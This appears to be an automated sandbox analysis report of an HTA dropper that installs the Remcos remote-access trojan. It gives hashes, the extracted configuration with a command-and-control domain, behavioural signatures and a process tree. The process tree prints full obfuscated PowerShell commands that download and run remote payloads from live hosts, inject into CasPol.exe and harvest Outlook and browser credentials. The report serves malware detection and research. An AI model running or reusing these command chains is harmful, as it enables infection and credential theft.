Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
04-02-2025 19:17
Static task
static1
Behavioral task
behavioral1
Sample
shemygoodgirlwholovesmebestthignstobegoodforrmes.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
shemygoodgirlwholovesmebestthignstobegoodforrmes.hta
Resource
win10v2004-20250129-en
General
-
Target
shemygoodgirlwholovesmebestthignstobegoodforrmes.hta
-
Size
14KB
-
MD5
b88c259e79f89b18020b2af11487b53e
-
SHA1
632d89122dba2718319d2ae64f3ba8b73c557614
-
SHA256
76b6dfd52c8e728a974bb6122564ca779d8811cd3160dd20557a2a2228c23974
-
SHA512
b05ad7b57c73bb5ac905fe94b2b6c951bd534d4351ee4e5fd2c9e78912b7a3c40e21b5479dc3b4cea2ccfca73e9379e40a9d39bd63f05be30c785c31717ba183
-
SSDEEP
96:fSwF8+hkwF7+h9GjQIwX7fW2fswFDwFW+hTwFB+:qsvKsKPG0b7+BsDspVsw
Malware Config
Extracted
remcos
zyn30
newtimeforrmsupdates.duckdns.org:14645
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-1MFHM3
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4068-110-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/3348-106-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/4216-104-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4068-110-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4216-104-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 19 4228 powershell.exe 23 4484 powershell.exe 24 4484 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2904 cmd.exe 4228 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 4484 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4484 set thread context of 2632 4484 powershell.exe 96 PID 2632 set thread context of 4216 2632 CasPol.exe 97 PID 2632 set thread context of 4068 2632 CasPol.exe 98 PID 2632 set thread context of 3348 2632 CasPol.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4228 powershell.exe 4228 powershell.exe 4484 powershell.exe 4484 powershell.exe 4216 CasPol.exe 4216 CasPol.exe 3348 CasPol.exe 3348 CasPol.exe 4216 CasPol.exe 4216 CasPol.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2632 CasPol.exe 2632 CasPol.exe 2632 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 4484 powershell.exe Token: SeDebugPrivilege 3348 CasPol.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 3684 wrote to memory of 2904 3684 mshta.exe 86 PID 3684 wrote to memory of 2904 3684 mshta.exe 86 PID 3684 wrote to memory of 2904 3684 mshta.exe 86 PID 2904 wrote to memory of 4228 2904 cmd.exe 88 PID 2904 wrote to memory of 4228 2904 cmd.exe 88 PID 2904 wrote to memory of 4228 2904 cmd.exe 88 PID 4228 wrote to memory of 4760 4228 powershell.exe 90 PID 4228 wrote to memory of 4760 4228 powershell.exe 90 PID 4228 wrote to memory of 4760 4228 powershell.exe 90 PID 4760 wrote to memory of 776 4760 csc.exe 91 PID 4760 wrote to memory of 776 4760 csc.exe 91 PID 4760 wrote to memory of 776 4760 csc.exe 91 PID 4228 wrote to memory of 2752 4228 powershell.exe 93 PID 4228 wrote to memory of 2752 4228 powershell.exe 93 PID 4228 wrote to memory of 2752 4228 powershell.exe 93 PID 2752 wrote to memory of 4484 2752 WScript.exe 94 PID 2752 wrote to memory of 4484 2752 WScript.exe 94 PID 2752 wrote to memory of 4484 2752 WScript.exe 94 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 4484 wrote to memory of 2632 4484 powershell.exe 96 PID 2632 wrote to memory of 4216 2632 CasPol.exe 97 PID 2632 wrote to memory of 4216 2632 CasPol.exe 97 PID 2632 wrote to memory of 4216 2632 CasPol.exe 97 PID 2632 wrote to memory of 4216 2632 CasPol.exe 97 PID 2632 wrote to memory of 4068 2632 CasPol.exe 98 PID 2632 wrote to memory of 4068 2632 CasPol.exe 98 PID 2632 wrote to memory of 4068 2632 CasPol.exe 98 PID 2632 wrote to memory of 4068 2632 CasPol.exe 98 PID 2632 wrote to memory of 3348 2632 CasPol.exe 99 PID 2632 wrote to memory of 3348 2632 CasPol.exe 99 PID 2632 wrote to memory of 3348 2632 CasPol.exe 99 PID 2632 wrote to memory of 3348 2632 CasPol.exe 99
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\shemygoodgirlwholovesmebestthignstobegoodforrmes.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOWersHELl.ExE -Ex bypasS -nop -W 1 -c DEViCEcreDentIALDePloYmenT ; Iex($(iex('[SysteM.tEXT.ENCOding]'+[Char]0X3A+[ChAr]58+'Utf8.gEtStrIng([sySTeM.CoNveRT]'+[ChAR]58+[cHAr]0X3a+'FrOMbAsE64stRiNG('+[ChAR]34+'JGszTnUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVGSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWW5qeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXFxZHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUVGLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJCR2tsQUhCdVF5WSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZk5xUUd1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGszTnU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjkuMTAuMzAveGFtcHAva2tucy9zaGVpc215YmVhdXRpZnVsbGFkeXdob2xvdmVzbWUuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyIsMCwwKTtzVGFSdC1zbEVFUCgzKTtJTnZPa2UtSXRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyI='+[ChAR]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWersHELl.ExE -Ex bypasS -nop -W 1 -c DEViCEcreDentIALDePloYmenT ; Iex($(iex('[SysteM.tEXT.ENCOding]'+[Char]0X3A+[ChAr]58+'Utf8.gEtStrIng([sySTeM.CoNveRT]'+[ChAR]58+[cHAr]0X3a+'FrOMbAsE64stRiNG('+[ChAR]34+'JGszTnUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVGSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWW5qeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXFxZHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUVGLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJCR2tsQUhCdVF5WSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZk5xUUd1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGszTnU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjkuMTAuMzAveGFtcHAva2tucy9zaGVpc215YmVhdXRpZnVsbGFkeXdob2xvdmVzbWUuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyIsMCwwKTtzVGFSdC1zbEVFUCgzKTtJTnZPa2UtSXRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyI='+[ChAR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ll2g3mbk\ll2g3mbk.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAAF5.tmp" "c:\Users\Admin\AppData\Local\Temp\ll2g3mbk\CSC3A525526800748228662A9FAAB6ED3E3.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:776
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sheismybeautifulladywholovesmbeautifullad.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAGkAdABlAHIAaQB0AG4AZQBoAHQAaQB3AGUAcgB1AHQAYwBpAHAAdABzAGUAYgB5AG0AZQBlAHMALwBzAG4AawBrAC8AcABwAG0AYQB4AC8AMAAzAC4AMAAxAC4AOQAyAC4ANQA4ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAG0AdwBuAG0AZQBtAGMAbQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA4ADYANAAwADAAOQA2AC8AeAA5AGUAdwB0AGwAZQBtAGYAcABoAGYAdwB2AGYAcwA4ADMAcwBzAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgAFsAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBtAGEAaQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkA')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ctrmevxgajftsgpicxiaoqxjcrfwfdywh"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4216
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\mvwffn"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4068
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ppcqfgtbk"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
19KB
MD5cc100bb1646352e0b167e91f7d137b0a
SHA1655590811fb0336e91c13d12f7d2cf4027349698
SHA2567870242178471ba4478f62fcd931463c07b4782c2344e7bfecc9711f9dd8bab1
SHA512d6412937801e924ab32e7e961bb798ec6fb3c8afd48cec5a7175c1c7de6843f3067611b4bd7965a05890a470645a44672a685a184e853fee4fdd102fcf6edd9e
-
Filesize
1KB
MD52ff15de88b919f967f761baac62cf88e
SHA11f3b7fe92f6a515bb3367fc8bb89ab220fd37932
SHA2562bf142169be25a2d89c8e7322a21d132dca37b7c4ea881e519a371b6e960750e
SHA512fadb201107d333c07a1947e51907a0e89a5b7c0df5d328501a6ef9f699d32308aa79b09b1a7fc2310a17abcdc8cc7adceca283d2cdd4e1b555bfa586e01a8f11
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD59692557b6cb140cfd24cc675484da561
SHA1219b44afdf0f21474c5de5209f809fb6380aafaf
SHA256def2df7a49987ed2dd1126644c208a922251f240ff4151434747cc7f37b72f86
SHA5126923b8800538b76855e7ae9f27a5eab0a5697664755cf1c58db7f39bc8a136274eac67b87c33d2b51d554e1422855dc8365731c5b65599c802f28773149f7d3f
-
Filesize
3KB
MD5690acd064b00edb60d08cb4a52d58fa3
SHA17e0c75c1db2b68502f15984442f5b4bae76bbe6b
SHA25628aa3f00c1d06e63f748b3828080863461422a0032e22ec83b4580c71ae1ed34
SHA512b2412e5c13fe7e534c1b464bce88d68459927f0e8367453a44fade2db41c8c8038833fd4a50deadb77c0065e4d646a0de7aa553c30207c9843ddb4fae8681e15
-
Filesize
209KB
MD57dcf0b4585dd514d6320f1380cdf323c
SHA19800ed24aae82b984034dab184b0a2df4a21a81e
SHA256f4f1b9da47072e15e360050cc4c3a78f6d1d7fe9c2695bd0b6680a1e2acb0987
SHA5122d9d0d25992aa555f1e17995a73c3d610b8a170bcff4921184f8d54d78c23eb4e63acbd321367f583beaec260b3dd81b0a213931be47bc11612b4460e816d4b1
-
Filesize
652B
MD5991113afc5b11f070b60dfff9ff4654a
SHA1e372cea9d736c4e5825b8a7f65549bd2baf40c09
SHA256ec88d89a215110e42d29bfc1d137775c1bf527478e08b5e6f607754708120b9e
SHA5126d9f72a1c81d2137c968247d4824cb6ad1cdd69e7ffbfe05131c4042f62a4f974f1d04de95893d0b1e7ae43d04182e7a5aa84306719559d8b88e6efbc86e218b
-
Filesize
476B
MD55b2e7d35de72278f9da88c640f9e7481
SHA1e5d0eb3c997e4bbb1e3e9f001858a6bd34019465
SHA2565bb90192a83dd9ead0f6a41f002ac0cf6a9e4e7c3acaf08e9f8bf7b5947384c0
SHA512e335d94e966c71e40f87b4bd595ce365b54992ce97aa33b0181ded2d19ec7f8fed59540215556e78181a39a714854d33f0aa6de506df2c1fc19f35e7d7a40d56
-
Filesize
369B
MD556fa768436a8ea780c77ad722be66b78
SHA139d39c72ec8771f0a5a7bc6d3527996079e28fd0
SHA25677b63d6cc82d32a57091489f8baad34debe57dd7cb9860e3140a8452ea7752c5
SHA512eecddfee40a9aad8b2d859f6e3520fb09be0407bc4bcc9d14c2f7bc17063089a3d229b0da14503c2afcc32f4f4ccfadbbbd53927cb43d2e911984964e98e5e57